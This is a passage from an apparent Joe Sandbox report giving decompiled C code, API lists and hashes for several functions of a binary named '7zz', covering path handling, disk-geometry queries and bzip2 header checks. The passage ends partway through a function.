                                                                      • Associated: 0000000F.00000002.496253361.000000000048A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496275911.000000000048B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496281171.000000000048C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496286175.000000000048D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496295745.0000000000490000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496304475.0000000000499000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_15_2_400000_7zz.jbxd
                                                                      Similarity
                                                                      • API ID: H_prolog$FreeString
                                                                      • String ID: )
                                                                      • API String ID: 397689101-2427484129
                                                                      • Opcode ID: df01c1d9236870b908461b3370f7b2645975f0d64cdd804e5c176365fc9b52a3
                                                                      • Instruction ID: 3cd5448d51800a9ea3fb603d1c019fc727f39b37be062062b600306fe1c5b3de
                                                                      • Opcode Fuzzy Hash: df01c1d9236870b908461b3370f7b2645975f0d64cdd804e5c176365fc9b52a3
                                                                      • Instruction Fuzzy Hash: 06036C30900259DFDF15DFA5C984BEDBBB0AF18308F14809EE849A7292DB789E85CF55
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 0040B6E9 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 127COMMON
                                                                      Download Yara Rule
                                                                      C-Code - Quality: 96%
                                                                      			E0040B6E9(intOrPtr* __ecx, intOrPtr __edx) {
				WCHAR* _t40;
				long _t42;
				WCHAR* _t44;
				void* _t45;
				void* _t46;
				void* _t47;
				intOrPtr* _t54;
				WCHAR* _t57;
				intOrPtr* _t59;
				WCHAR* _t62;
				void* _t72;
				WCHAR* _t75;
				void* _t78;
				intOrPtr _t80;
				intOrPtr _t82;
				WCHAR* _t85;
				void* _t86;

				_t59 = __ecx;
				E0046B890(0x473df0, _t86);
				_t57 = 0;
				 *((intOrPtr*)(__edx + 4)) = 0;
				 *((short*)( *((intOrPtr*)(__edx)))) = 0;
				_t82 =  *__ecx;
				_t78 = 0;
				 *((intOrPtr*)(_t86 - 0x14)) = __edx;
				 *((intOrPtr*)(_t86 - 0x10)) = __ecx;
				if(_t82 == 0) {
					L3:
					if(_t78 < 1 || _t82 == 0x5c || _t82 == 0x2e && (_t78 == 1 || _t78 == 2 &&  *((intOrPtr*)(_t59 + 2)) == _t82)) {
						_t40 = 1;
						goto L28;
					} else {
						 *(_t86 - 0x20) = _t57;
						 *(_t86 - 0x1c) = _t57;
						 *(_t86 - 0x18) = _t57;
						E00401E9A(_t86 - 0x20, 3);
						_t80 =  *((intOrPtr*)(_t86 - 0x10));
						 *(_t86 - 4) = _t57;
						if(_t78 <= 3 ||  *((short*)(_t80 + 2)) != 0x3a ||  *((short*)(_t80 + 4)) != 0x5c) {
							L16:
							if( *(_t86 - 0x18) <= 0x105) {
								E00401E9A(_t86 - 0x20, 0x105);
							}
							_t42 = GetCurrentDirectoryW(0x105,  *(_t86 - 0x20));
							_t85 =  *(_t86 - 0x20);
							_t62 = 0;
							if( *_t85 == _t57) {
								L21:
								_t72 = _t62 + _t62;
								 *(_t72 + _t85) = _t57;
								 *(_t86 - 0x1c) = _t62;
								if(_t42 == _t57 || _t42 > 0x104) {
									goto L26;
								} else {
									_t44 =  *(_t86 - 0x20);
									_t112 =  *((short*)(_t72 + _t44 - 2)) - 0x5c;
									if( *((short*)(_t72 + _t44 - 2)) != 0x5c) {
										E004054FE(_t86 - 0x20, _t72, _t112, 0x5c);
									}
									goto L25;
								}
							} else {
								_t75 = _t85;
								do {
									_t62 =  &(_t62[0]);
									_t75 =  &(_t75[1]);
								} while ( *_t75 != _t57);
								goto L21;
							}
						} else {
							if(_t82 < 0x61 || _t82 > 0x7a) {
								if(_t82 < 0x41 || _t82 > 0x5a) {
									goto L16;
								} else {
									goto L25;
								}
							} else {
								L25:
								_t45 = E00403532(_t86 - 0x44, L"\\\\?\\");
								_push(_t86 - 0x20);
								 *(_t86 - 4) = 1;
								_t46 = E0040B0A0(_t86 - 0x38, _t45);
								_push(_t80);
								 *(_t86 - 4) = 2;
								_t47 = L0040BE68(_t86 - 0x2c, _t46);
								 *(_t86 - 4) = 3;
								E00401E26( *((intOrPtr*)(_t86 - 0x14)), _t47);
								E00407A18( *((intOrPtr*)(_t86 - 0x2c)));
								E00407A18( *((intOrPtr*)(_t86 - 0x38)));
								E00407A18( *((intOrPtr*)(_t86 - 0x44)));
								_t57 = 1;
								L26:
								E00407A18( *(_t86 - 0x20));
								_t40 = _t57;
								L28:
								 *[fs:0x0] =  *((intOrPtr*)(_t86 - 0xc));
								return _t40;
							}
						}
					}
				}
				_t54 = __ecx;
				do {
					_t78 = _t78 + 1;
					_t54 = _t54 + 2;
				} while ( *_t54 != 0);
				goto L3;
			}




















                                                                      0x0040b6e9
                                                                      0x0040b6ee
                                                                      0x0040b6f9
                                                                      0x0040b6fc
                                                                      0x0040b6ff
                                                                      0x0040b702
                                                                      0x0040b706
                                                                      0x0040b70b
                                                                      0x0040b70e
                                                                      0x0040b711
                                                                      0x0040b71d
                                                                      0x0040b720
                                                                      0x0040b852
                                                                      0x00000000
                                                                      0x0040b74e
                                                                      0x0040b753
                                                                      0x0040b756
                                                                      0x0040b759
                                                                      0x0040b75c
                                                                      0x0040b764
                                                                      0x0040b767
                                                                      0x0040b76a
                                                                      0x0040b792
                                                                      0x0040b79a
                                                                      0x0040b7a0
                                                                      0x0040b7a0
                                                                      0x0040b7a9
                                                                      0x0040b7af
                                                                      0x0040b7b2
                                                                      0x0040b7b7
                                                                      0x0040b7c3
                                                                      0x0040b7c3
                                                                      0x0040b7c8
                                                                      0x0040b7cc
                                                                      0x0040b7cf
                                                                      0x00000000
                                                                      0x0040b7d8
                                                                      0x0040b7d8
                                                                      0x0040b7db
                                                                      0x0040b7e1
                                                                      0x0040b7e8
                                                                      0x0040b7e8
                                                                      0x00000000
                                                                      0x0040b7e1
                                                                      0x0040b7b9
                                                                      0x0040b7b9
                                                                      0x0040b7bb
                                                                      0x0040b7bb
                                                                      0x0040b7bd
                                                                      0x0040b7be
                                                                      0x00000000
                                                                      0x0040b7bb
                                                                      0x0040b77a
                                                                      0x0040b77e
                                                                      0x0040b78a
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x0040b7ed
                                                                      0x0040b7ed
                                                                      0x0040b7f5
                                                                      0x0040b7ff
                                                                      0x0040b803
                                                                      0x0040b807
                                                                      0x0040b80c
                                                                      0x0040b812
                                                                      0x0040b816
                                                                      0x0040b81f
                                                                      0x0040b823
                                                                      0x0040b82b
                                                                      0x0040b833
                                                                      0x0040b83b
                                                                      0x0040b843
                                                                      0x0040b845
                                                                      0x0040b848
                                                                      0x0040b84e
                                                                      0x0040b854
                                                                      0x0040b85a
                                                                      0x0040b862
                                                                      0x0040b862
                                                                      0x0040b77e
                                                                      0x0040b76a
                                                                      0x0040b720
                                                                      0x0040b713
                                                                      0x0040b715
                                                                      0x0040b715
                                                                      0x0040b717
                                                                      0x0040b718
                                                                      0x00000000

                                                                      APIs
                                                                      • __EH_prolog.LIBCMT ref: 0040B6EE
                                                                      • GetCurrentDirectoryW.KERNEL32(00000105,00000000,00000003,746AF8A0,00000002,00000000), ref: 0040B7A9
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000F.00000002.496130109.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 0000000F.00000002.496104392.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496236300.000000000047A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496253361.000000000048A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496275911.000000000048B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496281171.000000000048C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496286175.000000000048D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496295745.0000000000490000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496304475.0000000000499000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_15_2_400000_7zz.jbxd
                                                                      Similarity
                                                                      • API ID: CurrentDirectoryH_prolog
                                                                      • String ID: \\?\
                                                                      • API String ID: 1365920442-4282027825
                                                                      • Opcode ID: 49f17fd8d122e47fb144a76ab3c83f5fdf8b6d48540665d144ff3d7243f02d8d
                                                                      • Instruction ID: 33aa0c41793a772aa9b559d5eda45f0ded9524b07273b0857cd6b9bc5248d9c8
                                                                      • Opcode Fuzzy Hash: 49f17fd8d122e47fb144a76ab3c83f5fdf8b6d48540665d144ff3d7243f02d8d
                                                                      • Instruction Fuzzy Hash: E0412736D001049ACF24AFA5C8869EEB775FF99304F54803FE015B72A1D7785A858BAE
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 0040BACB Relevance: 4.6, APIs: 3, Instructions: 83COMMON
                                                                      Download Yara Rule
                                                                      C-Code - Quality: 100%
                                                                      			E0040BACB(void** __ecx) {
				long _v8;
				signed int _v12;
				signed int _v16;
				intOrPtr _v20;
				intOrPtr _v28;
				void _v32;
				void* _v52;
				void* _v56;
				void _v64;
				void* _t29;
				void* _t36;
				void* _t40;
				signed int _t45;
				void** _t47;

				_t47 = __ecx;
				_t29 =  *__ecx;
				if(_t29 == 0xffffffff || __ecx[1] == 0) {
					L9:
					return _t29;
				} else {
					__ecx[2] = 0;
					__ecx[1] = 1;
					__ecx[3] = 0;
					if(DeviceIoControl(_t29, 0x74004, 0, 0,  &_v64, 0x20,  &_v8, 0) == 0) {
						_t29 = DeviceIoControl( *_t47, 0x70000, 0, 0,  &_v32, 0x18,  &_v8, 0);
						if(_t29 == 0) {
							_t29 = DeviceIoControl( *_t47, 0x2404c, 0, 0,  &_v32, 0x18,  &_v8, 0);
							if(_t29 == 0) {
								_t47[1] = 0;
							}
						}
						if(_t47[1] == 0) {
							goto L9;
						} else {
							_t33 = _v12;
							_t45 = _v12 * _v16 >> 0x20;
							_t36 = E0046B370(E0046B370(_t33 * _v16, _t45, _v20, 0), _t45, _v32, _v28);
							_t47[2] = _t36;
							_t47[3] = _t45;
							return _t36;
						}
					}
					_t47[2] = _v56;
					_t40 = _v52;
					_t47[3] = _t40;
					return _t40;
				}
			}

















                                                                      0x0040bad3
                                                                      0x0040bad6
                                                                      0x0040badb
                                                                      0x0040bb87
                                                                      0x0040bb87
                                                                      0x0040baec
                                                                      0x0040bb04
                                                                      0x0040bb08
                                                                      0x0040bb0c
                                                                      0x0040bb13
                                                                      0x0040bb37
                                                                      0x0040bb3b
                                                                      0x0040bb51
                                                                      0x0040bb55
                                                                      0x0040bb57
                                                                      0x0040bb57
                                                                      0x0040bb55
                                                                      0x0040bb5d
                                                                      0x00000000
                                                                      0x0040bb5f
                                                                      0x0040bb5f
                                                                      0x0040bb63
                                                                      0x0040bb78
                                                                      0x0040bb7d
                                                                      0x0040bb80
                                                                      0x00000000
                                                                      0x0040bb80
                                                                      0x0040bb5d
                                                                      0x0040bb18
                                                                      0x0040bb1b
                                                                      0x0040bb1e
                                                                      0x00000000
                                                                      0x0040bb1e

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 0000000F.00000002.496130109.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 0000000F.00000002.496104392.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496236300.000000000047A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496253361.000000000048A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496275911.000000000048B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496281171.000000000048C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496286175.000000000048D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496295745.0000000000490000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496304475.0000000000499000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_15_2_400000_7zz.jbxd
                                                                      Similarity
                                                                      • API ID: ControlDevice
                                                                      • String ID:
                                                                      • API String ID: 2352790924-0
                                                                      • Opcode ID: 9eccbc8ffd87a30f2666d0e633387ac5e2bfdfb915f13c61e43ec2ccc257976a
                                                                      • Instruction ID: c42c7d020c1af8b21d211a1f20c38670249b3755f55fb040fe636e444498998b
                                                                      • Opcode Fuzzy Hash: 9eccbc8ffd87a30f2666d0e633387ac5e2bfdfb915f13c61e43ec2ccc257976a
                                                                      • Instruction Fuzzy Hash: CE21A4B290020CBFE710DB95CC81EABB7FCEB04794B00C52AF655E3690D375AD448BA8
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 004465E0 Relevance: 4.0, Strings: 3, Instructions: 282COMMONCrypto
                                                                      Download Yara Rule
                                                                      C-Code - Quality: 82%
                                                                      			E004465E0(void* __ecx) {
				intOrPtr _t93;
				signed int _t97;
				void* _t113;
				void* _t119;
				void* _t206;
				void* _t208;
				void* _t209;
				void* _t214;
				void* _t215;
				char* _t216;
				intOrPtr _t220;
				void* _t222;
				void* _t223;
				void* _t224;

				_t214 = __ecx;
				 *((intOrPtr*)(__ecx + 0x6fe8)) =  *((intOrPtr*)(_t224 + 8));
				_t93 = E00446260(__ecx);
				if(_t93 != 0) {
					L39:
					return _t93;
				} else {
					_t215 = 0;
					if( *((intOrPtr*)(__ecx + 0x7010)) <= 0) {
						L9:
						_t216 =  *((intOrPtr*)(_t224 + 0x28));
						_t206 = 0;
						 *_t216 = 0;
						do {
							 *((char*)(_t224 + _t206 + 0x1c)) = E00445F70();
							_t206 = _t206 + 1;
						} while (_t206 < 4);
						if( *((char*)(_t224 + 0x1c)) != 0x42 ||  *((char*)(_t224 + 0x1d)) != 0x5a ||  *((char*)(_t224 + 0x1e)) != 0x68) {
							L38:
							return 0;
						}
						_t97 =  *(_t224 + 0x1f);
						if(_t97 <= 0x30 || _t97 > 0x39) {
							goto L38;
						}
						 *_t216 = 1;
						 *((intOrPtr*)(_t214 + 0x6fe4)) = 0;
						_t220 = ((_t97 & 0x000000ff) + (_t97 & 0x000000ff) * 4 + ((_t97 & 0x000000ff) + (_t97 & 0x000000ff) * 4) * 4 + ((_t97 & 0x000000ff) + (_t97 & 0x000000ff) * 4 + ((_t97 & 0x000000ff) + (_t97 & 0x000000ff) * 4) * 4) * 4 + ((_t97 & 0x000000ff) + (_t97 & 0x000000ff) * 4 + ((_t97 & 0x000000ff) + (_t97 & 0x000000ff) * 4) * 4 + ((_t97 & 0x000000ff) + (_t97 & 0x000000ff) * 4 + ((_t97 & 0x000000ff) + (_t97 & 0x000000ff) * 4) * 4) * 4) * 4 + ((_t97 & 0x000000ff) + (_t97 & 0x000000ff) * 4 + ((_t97 & 0x000000ff) + (_t97 & 0x000000ff) * 4) * 4 + ((_t97 & 0x000000ff) + (_t97 & 0x000000ff) * 4 + ((_t97 & 0x000000ff) + (_t97 & 0x000000ff) * 4) * 4) * 4 + ((_t97 & 0x000000ff) + (_t97 & 0x000000ff) * 4 + ((_t97 & 0x000000ff) + (_t97 & 0x000000ff) * 4) * 4 + ((_t97 & 0x000000ff) + (_t97 & 0x000000ff) * 4 + ((_t97 & 0x000000ff) + (_t97 & 0x000000ff) * 4) * 4) * 4) * 4) * 4 << 5) - 0x493e00;
						if( *((intOrPtr*)(_t214 + 0x7014)) == 0) {
							_t207 = _t214 + 0x138;
							 *((intOrPtr*)(_t224 + 0x18)) =  *((intOrPtr*)(_t214 + 0x6fec));
							asm("cdq");
							asm("sbb edx, ebx");
							asm("adc edx, ecx");
							_t93 = L00447BA0(_t214,  *((intOrPtr*)(_t214 + 0x140)) -  *((intOrPtr*)(_t214 + 0x148)) - (0x20 -  *((intOrPtr*)(_t214 + 0x138)) >> 3) +  *((intOrPtr*)(_t214 + 0x150)),  *((intOrPtr*)(_t214 + 0x6fec)));
							if(_t93 == 0) {
								while(1) {
									_t93 = E00446500(_t214, _t224 + 0x2c, _t224 + 0x1c);
									if(_t93 != 0) {
										goto L39;
									}
									if( *((intOrPtr*)(_t224 + 0x2c)) != 0) {
										goto L38;
									}
									_t146 =  *((intOrPtr*)(_t224 + 0x18));
									_push(_t224 + 0x28);
									_push(_t224 + 0x14);
									_push(_t224 + 0x14);
									_push(_t214 + 0x47b4);
									_push(_t214 + 0x160);
									_push(_t220);
									_t93 = E004469A0(_t207,  *( *((intOrPtr*)(_t224 + 0x18))));
									if(_t93 != 0) {
										goto L39;
									} else {
										E004470F0( *_t146,  *((intOrPtr*)(_t224 + 0x10)));
										if( *((intOrPtr*)(_t224 + 0x28)) == 0) {
											_push(_t214 + 0x10);
											_t205 =  *((intOrPtr*)(_t224 + 0x14));
											_push( *((intOrPtr*)(_t224 + 0x14)));
											_t113 = E00447150( *_t146 + 0x400,  *((intOrPtr*)(_t224 + 0x14)));
										} else {
											_t205 =  *((intOrPtr*)(_t224 + 0x10));
											_push(_t214 + 0x10);
											_push( *((intOrPtr*)(_t224 + 0x14)));
											_t113 = E00447240( *_t146 + 0x400,  *((intOrPtr*)(_t224 + 0x10)));
										}
										if(_t113 !=  *((intOrPtr*)(_t224 + 0x1c))) {
											return 1;
										} else {
											asm("cdq");
											asm("sbb edx, ebx");
											asm("adc edx, ecx");
											_t119 = L00447BA0(_t214,  *((intOrPtr*)(_t207 + 8)) -  *((intOrPtr*)(_t207 + 0x10)) - (0x20 -  *_t207 >> 3) +  *((intOrPtr*)(_t207 + 0x18)), _t205);
											if(_t119 == 0) {
												continue;
											} else {
												return _t119;
											}
										}
									}
									goto L40;
								}
							}
							goto L39;
						} else {
							 *((intOrPtr*)(_t214 + 0x7018)) = 0;
							 *((char*)(_t214 + 0x701e)) = 0;
							 *((char*)(_t214 + 0x701d)) = 0;
							 *((char*)(_t214 + 0x701c)) = 0;
							L00467B30(_t214 + 0x7020);
							E00467B10( *((intOrPtr*)(_t214 + 0x6fec)) + 0x18);
							 *((intOrPtr*)(_t214 + 0x7028)) = 0;
							 *((intOrPtr*)(_t214 + 0x7024)) = 0;
							_t150 = _t214 + 0x6ff4;
							 *((intOrPtr*)(_t214 + 0x702c)) = _t220;
							E00467B10(_t214 + 0x6ff4);
							_t208 = 0;
							if( *((intOrPtr*)(_t214 + 0x7010)) > 0) {
								_t223 = 0;
								do {
									E00467AC0( *((intOrPtr*)( *((intOrPtr*)(_t214 + 0x6fec)) + _t223 + 0x10)));
									_t208 = _t208 + 1;
									_t223 = _t223 + 0x11c;
								} while (_t208 <  *((intOrPtr*)(_t214 + 0x7010)));
							}
							L00467B30(_t150);
							E00467B10(_t214 + 0x7020);
							_t209 = 0;
							if( *((intOrPtr*)(_t214 + 0x7010)) > 0) {
								_t222 = 0;
								do {
									_t197 =  *((intOrPtr*)(_t214 + 0x6fec));
									E00467AC0( *((intOrPtr*)( *((intOrPtr*)(_t214 + 0x6fec)) + _t222 + 0x14)));
									_t209 = _t209 + 1;
									_t222 = _t222 + 0x11c;
								} while (_t209 <  *((intOrPtr*)(_t214 + 0x7010)));
							}
							L00467B30(_t214 + 0x7020);
							_t93 =  *((intOrPtr*)(_t214 + 0x7028));
							if(_t93 != 0) {
								goto L39;
							} else {
								_t93 =  *((intOrPtr*)(_t214 + 0x7024));
								if(_t93 != 0) {
									goto L39;
								} else {
									asm("cdq");
									asm("sbb edx, edi");
									asm("adc edx, ebx");
									return L00447BA0(_t214,  *((intOrPtr*)(_t214 + 0x140)) -  *((intOrPtr*)(_t214 + 0x148)) - (0x20 -  *((intOrPtr*)(_t214 + 0x138)) >> 3) +  *((intOrPtr*)(_t214 + 0x150)), _t197);
								}
							}
						}
					} else {
						 *((intOrPtr*)(_t224 + 0x2c)) = 0;
						while(1) {
							_t197 =  *((intOrPtr*)(_t224 + 0x2c));
							_t213 =  *((intOrPtr*)(_t214 + 0x6fec)) +  *((intOrPtr*)(_t224 + 0x2c));
							if(E00445E90( *((intOrPtr*)(_t214 + 0x6fec)) +  *((intOrPtr*)(_t224 + 0x2c))) == 0) {
								break;
							}
							if( *((intOrPtr*)(_t214 + 0x7014)) == 0) {
								L8:
								_t215 = _t215 + 1;
								 *((intOrPtr*)(_t224 + 0x2c)) =  *((intOrPtr*)(_t224 + 0x2c)) + 0x11c;
								if(_t215 <  *((intOrPtr*)(_t214 + 0x7010))) {
									continue;
								} else {
									goto L9;
								}
							} else {
								_t93 = L00467B30(_t213 + 0x10);
								if(_t93 != 0) {
									goto L39;
								} else {
									_t93 = L00467B30(_t213 + 0x14);
									if(_t93 != 0) {
										goto L39;
									} else {
										_t93 = L00467B30(_t213 + 0x18);
										if(_t93 != 0) {
											goto L39;
										} else {
											goto L8;
										}
									}
								}
							}
							goto L40;
						}
						return 0x8007000e;
					}
				}
				L40:
			}

















                                                                      0x004465ea
                                                                      0x004465ed
                                                                      0x004465f3
                                                                      0x004465fc
                                                                      0x00446994
                                                                      0x00446994
                                                                      0x00446602
                                                                      0x00446608
                                                                      0x0044660c
                                                                      0x00446680
                                                                      0x00446680
                                                                      0x00446684
                                                                      0x00446686
                                                                      0x0044668a
                                                                      0x00446691
                                                                      0x00446695
                                                                      0x00446696
                                                                      0x004466a0
                                                                      0x0044698b
                                                                      0x00000000
                                                                      0x0044698b
                                                                      0x004466bc
                                                                      0x004466c2
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x004466d5
                                                                      0x004466d9
                                                                      0x004466f8
                                                                      0x00446700
                                                                      0x0044685d
                                                                      0x0044686a
                                                                      0x00446872
                                                                      0x0044687b
                                                                      0x00446882
                                                                      0x00446888
                                                                      0x0044688f
                                                                      0x00446895
                                                                      0x004468a1
                                                                      0x004468a8
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x004468b4
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x004468ba
                                                                      0x004468c6
                                                                      0x004468cb
                                                                      0x004468d2
                                                                      0x004468d9
                                                                      0x004468da
                                                                      0x004468dd
                                                                      0x004468e0
                                                                      0x004468e7
                                                                      0x00000000
                                                                      0x004468ed
                                                                      0x004468f3
                                                                      0x004468fe
                                                                      0x0044692b
                                                                      0x0044692c
                                                                      0x00446930
                                                                      0x00446931
                                                                      0x00446900
                                                                      0x00446904
                                                                      0x0044690b
                                                                      0x0044690c
                                                                      0x00446915
                                                                      0x00446915
                                                                      0x0044693a
                                                                      0x00446988
                                                                      0x0044693c
                                                                      0x0044694f
                                                                      0x00446958
                                                                      0x0044695f
                                                                      0x00446965
                                                                      0x0044696c
                                                                      0x00000000
                                                                      0x00446979
                                                                      0x00446979
                                                                      0x00446979
                                                                      0x0044696c
                                                                      0x0044693a
                                                                      0x00000000
                                                                      0x004468e7
                                                                      0x00446895
                                                                      0x00000000
                                                                      0x00446706
                                                                      0x0044670c
                                                                      0x00446712
                                                                      0x00446719
                                                                      0x00446720
                                                                      0x00446727
                                                                      0x00446735
                                                                      0x0044673a
                                                                      0x00446740
                                                                      0x00446746
                                                                      0x0044674c
                                                                      0x00446754
                                                                      0x0044675f
                                                                      0x00446763
                                                                      0x00446765
                                                                      0x00446767
                                                                      0x00446771
                                                                      0x0044677c
                                                                      0x0044677d
                                                                      0x00446783
                                                                      0x00446767
                                                                      0x00446789
                                                                      0x00446794
                                                                      0x0044679f
                                                                      0x004467a3
                                                                      0x004467a5
                                                                      0x004467a7
                                                                      0x004467a7
                                                                      0x004467b1
                                                                      0x004467bc
                                                                      0x004467bd
                                                                      0x004467c3
                                                                      0x004467a7
                                                                      0x004467cd
                                                                      0x004467d2
                                                                      0x004467da
                                                                      0x00000000
                                                                      0x004467e0
                                                                      0x004467e0
                                                                      0x004467e8
                                                                      0x00000000
                                                                      0x004467ee
                                                                      0x00446815
                                                                      0x0044681d
                                                                      0x00446821
                                                                      0x00446833
                                                                      0x00446833
                                                                      0x004467e8
                                                                      0x004467da
                                                                      0x0044660e
                                                                      0x0044660e
                                                                      0x00446612
                                                                      0x00446618
                                                                      0x0044661c
                                                                      0x00446627
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00446635
                                                                      0x00446667
                                                                      0x00446671
                                                                      0x0044667a
                                                                      0x0044667e
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00446637
                                                                      0x0044663a
                                                                      0x00446641
                                                                      0x00000000
                                                                      0x00446647
                                                                      0x0044664a
                                                                      0x00446651
                                                                      0x00000000
                                                                      0x00446657
                                                                      0x0044665a
                                                                      0x00446661
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00446661
                                                                      0x00446651
                                                                      0x00446641
                                                                      0x00000000
                                                                      0x00446635
                                                                      0x00446842
                                                                      0x00446842
                                                                      0x0044660c
                                                                      0x00000000

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000F.00000002.496130109.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 0000000F.00000002.496104392.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496236300.000000000047A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496253361.000000000048A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496275911.000000000048B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496281171.000000000048C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496286175.000000000048D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496295745.0000000000490000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496304475.0000000000499000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_15_2_400000_7zz.jbxd
                                                                      Similarity
                                                                      • API ID: ErrorEventLastReset
                                                                      • String ID: B$Z$h
                                                                      • API String ID: 1621066496-418080759
                                                                      • Opcode ID: 31eb4e5eb83f84a862abec244540b5fd79ff3231d1edc22ba3dc5a5c688854da
                                                                      • Instruction ID: 230a258f7045333de16a7656bf94cdb6ffb83da81a8c701ada6b5a21721b5eb4
                                                                      • Opcode Fuzzy Hash: 31eb4e5eb83f84a862abec244540b5fd79ff3231d1edc22ba3dc5a5c688854da
                                                                      • Instruction Fuzzy Hash: 05A126717047018BD724DF39C890AABB7E1AF85308F45092EE5AA83341DB39F94DCB96
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 004285AD Relevance: 3.9, APIs: 1, Strings: 1, Instructions: 379COMMONCrypto
                                                                      Download Yara Rule
                                                                      C-Code - Quality: 89%
                                                                      			E004285AD(void* __ecx) {
				signed int _t160;
				intOrPtr _t162;
				signed int _t163;
				signed int _t164;
				signed int _t166;
				intOrPtr _t175;
				void* _t178;
				intOrPtr* _t188;
				signed int _t194;
				signed int _t196;
				intOrPtr* _t199;
				signed int _t202;
				signed int* _t205;
				intOrPtr _t211;
				signed int _t215;
				void* _t225;
				void* _t226;
				signed int _t240;
				signed int _t241;
				void* _t242;
				void* _t243;
				signed int _t244;
				void* _t245;
				intOrPtr _t246;
				signed int _t247;
				signed int _t250;
				signed int _t254;
				signed int _t255;
				signed int _t256;
				signed int _t258;
				signed int _t274;
				signed int _t276;
				void* _t278;
				signed int _t281;
				signed int _t296;
				void* _t297;
				signed int _t298;
				signed int _t299;
				void* _t301;
				intOrPtr* _t302;
				signed int _t303;
				signed int _t305;
				void* _t307;
				intOrPtr _t308;
				void* _t309;
				signed int _t310;
				void* _t312;
				signed int _t313;
				intOrPtr _t314;
				void* _t315;
				void* _t317;
				void* _t319;

				E0046B890(E00476AE2, _t319);
				_t317 = __ecx;
				_t305 = 0;
				if( *((char*)(__ecx + 0x110)) == 0) {
					_t250 =  *(__ecx + 0x24);
					if(_t250 != 0) {
						__eflags = _t250;
						 *(_t319 - 0x18) = 0;
						 *(_t319 - 0x14) = 0;
						 *(_t319 - 0x10) = 0;
						if(_t250 > 0) {
							do {
								_t303 =  *(_t319 - 0x10);
								__eflags =  *(_t317 + 0x38);
								_t211 =  *((intOrPtr*)( *((intOrPtr*)(_t317 + 0x28)) + _t303 * 4));
								_t314 =  *((intOrPtr*)(_t211 + 0x20));
								_t246 =  *((intOrPtr*)(_t211 + 0x24));
								 *((intOrPtr*)(_t319 - 0x20)) = _t314;
								if( *(_t317 + 0x38) == 0) {
									__eflags = _t303 - _t250 - 1;
									if(__eflags >= 0) {
										_t315 = _t317 + 0x94;
										E00408767(_t315, __eflags, 0);
										_t314 =  *((intOrPtr*)(_t319 - 0x20));
										 *( *(_t315 + 0xc)) =  *(_t319 - 0x14);
									} else {
